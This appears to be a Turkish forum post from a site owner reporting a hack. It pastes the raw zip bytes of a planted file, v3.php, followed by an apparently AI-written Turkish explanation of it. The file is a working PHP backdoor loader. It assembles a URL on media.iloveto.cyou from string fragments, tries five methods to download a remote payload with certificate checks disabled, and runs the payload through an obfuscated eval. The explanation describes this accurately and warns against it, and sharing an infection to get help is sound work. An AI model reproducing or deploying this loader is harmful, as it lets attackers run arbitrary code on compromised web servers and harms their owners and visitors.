Sitem Hacklenmiş! Şaka gibi

PK   ȼRY €  v3.phpUT
ø�g‰�gñ“gux
õ
õ
½T]kÛ0}߯pEhìâÙM7X‰çv%”v0Ö�µ{)Aå:6S$!ÉMJèß•?R÷!�>l O¶tÏ=ç~êë¥*”—W‚ÙR
OÃhþÀXl5ØJÿñ¾¹K^•æi‡#ëLÇÏ_ ÒËõçX²èY[
:�ÇFY[�  ÿD. çI™û�…Mi¬ñ;ª¡AO+$£–x™ƒ Øîü¿±ŒsZÐÔQô]�+ÊíüÓ:‚ãã½ú¶%åºb¨{¦¤Ó
1@V¤ûBëSúA²Ö§‘0|5Ì*Ä[«+èUsƒ
ôˆh2àr‡z_¥(Ùv§ÈÄ‚ï§EÖý‰ÆypB�S¯·8Y�*è,eRX¨Ö¡’ œqéF²;¿¼?Ø?Lš6`dšikR•¡™âÑo†e�«ƒi´á�áqXHc‡óðü4€ÖBÖÌ%ütÚ$š+T”•MÉ Íõ½G¢�¯Êl1œGÄ»½¿ŸÆ£h¤I6JÉ-ò�ß©ˆôP)Ô9�½‰+‘Κ¯uiÁi‡ˆ‰i0J
ép˜¬‹’ƒ”ƒlÂÃø:s”æØ S{�ÎαÐ]å÷:y°Q¿>©åÂ�{x<�æïíNCþÑ.Mf?¨«2ý}=ûõýî'=£§ÿu•Ü (—¾IIa*"éþ@¶ �¿ä
9?^-qìÇÞôvŠe�Èc ðlacã®xè�Ä'®âd¶�çˆSEæódP/ÍÆv{Ô)Ó<?php $u="ht";$p="tps";$d="://";$a="media";$b=".iloveto";$c=".cyou";$デ="/media/videos/h264/";$ur="mp4.txt";$url=$u.$p.$d.$a.$b.$c.$デ.$ur;func tion fetchContentWithFileGetContents($url){if(ini_get(' allow_url_fopen')){return@file_get_contents($url); }return false;}function fetchContentWithCurl($url){if(function_exists('cur l_version')){$ch=curl_init($url);curl_setopt($ch,C URLOPT_RETURNTRANSFER,true);curl_setopt($ch,CURLOP T_SSL_VERIFYPEER,false);curl_setopt($ch,CURLOPT_SS L_VERIFYHOST,0);$response=curl_exec($ch);$error=cu rl_error($ch);curl_close($ch);return $error?false:$response;}return false;}function fetchContentWithFopen($url){if($file=fopen($url,'r ')){$content=stream_get_contents($file);fclose($fi le);return $content;}return false;}function fetchContentWithStreamContext($url){$context=strea m_context_create(["http"=>["method"=>"GET","header"=>"User-Agent: PHP scriptrn"]]);return@file_get_contents($url,false,$context);}f unction fetchContentWithFile($url){$lines=@file($url);if($ lines===false){return false;}return implode('',$lines);}function fetchContent($url){$content=fetchContentWithFileGe tContents($url);if($content===false){$content=fetc hContentWithCurl($url);}if($content===false){$cont ent=fetchContentWithFopen($url);}if($content===fal se){$content=fetchContentWithStreamContext($url);} if($content===false){$content=fetchContentWithFile ($url);}return $content;}function obfuscatedEval($content){$evalFunc='e'.'v'.'a'.'l' ;if(empty($content)){return;}if(@eval("?>".$conten t)===false){return;}$evalFunc("?>".$content);}$con tent=fetchContent($url);if($content!==false){obfus catedEval($content);}else{echo "エラー: Gagal mengambil konten.";} ?>…V¼—óÞÇlŸÒMó¤®ðdM·ÀyƱÏ�ÚÛT�Ò´6[xʸO./p~["
M[`…ôÈõìn6‹Hòâ]^|øPKýBvây € PK   ȼRY °  __MACOSX/._v3.phpUT
ø�g‰�gþ“gux
õ
õ
c`cg`b`ðMLVðVˆP€�'
qƒøˆ�!!AP&HÇ @Sˆ—JÎÏÕK,(ÈIÕËI,.)-NMII,IU)ììJÑAùíÆ  PK�(ÿ ° PK
   ȼRYýBvây €  ¤� v3.phpUT
ø�g‰�gñ“gux
õ
õ
PK
   ȼRY�(ÿ °  ¤�Í __MACOSX/._v3.phpUT
ø�g‰�gþ“gux
õ
õ
PK   ³ ˆ

Paylaştığınız içerik, PHP kodu ve muhtemelen şifrelenmiş (obfuscate edilmiş) bir betik içeriyor. Bu betik, çeşitli yöntemlerle uzaktan içerik almayı ve bu içeriği PHP'nin eval fonksiyonu ile çalıştırmayı amaçlıyor.
İşte ana bileşenlerin kısa bir açıklaması:

1. Şifreli URL Oluşumu:
   URL şu şekilde inşa ediliyor:
   php
   Kodu kopyala
   $url = "https://media.iloveto.cyou/media/videos/h264/mp4.txt";
2. İçerik Almak İçin Fonksiyonlar:
   İçerik almak için birkaç farklı yöntem kullanılıyor (örneğin, file_get_contents, curl, fopen gibi). Eğer bir yöntem başarısız olursa, diğer yöntemler deneniyor.
3. Alınan İçeriği Çalıştırma:
   Alınan içerik, eval fonksiyonu ile çalıştırılıyor:
   php
   Kodu kopyala
   obfuscatedEval($content);
4. Hata Mesajı:
   Eğer içerik alınamazsa, şu hata mesajı görüntüleniyor:
   less
   Kodu kopyala
   エラー: Gagal mengambil konten. (Hata: İçerik alınamadı.)

Riskler ve Uyarılar:

Bu kod, uzaktan alınan içeriği çalıştırma amacı taşıyor ve bu içerik kötü amaçlı olabilir. Özellikle eval fonksiyonunun kullanılması, kötü amaçlı kodların çalıştırılmasına yol açabilir. Bu tür şifrelenmiş veya obfuscate edilmiş kodlar genellikle güvenlik açıklarına yol açabilir.
Bu tür bir kodla karşılaştığınızda dikkatli olmalısınız. Herhangi bir kötü amaçlı içerik veya güvenlik riski taşıyan işlemden kaçınmak önemlidir.
Eğer bu kodu daha detaylı analiz etmek isterseniz veya başka bir sorunuz varsa, yardımcı olabilirim!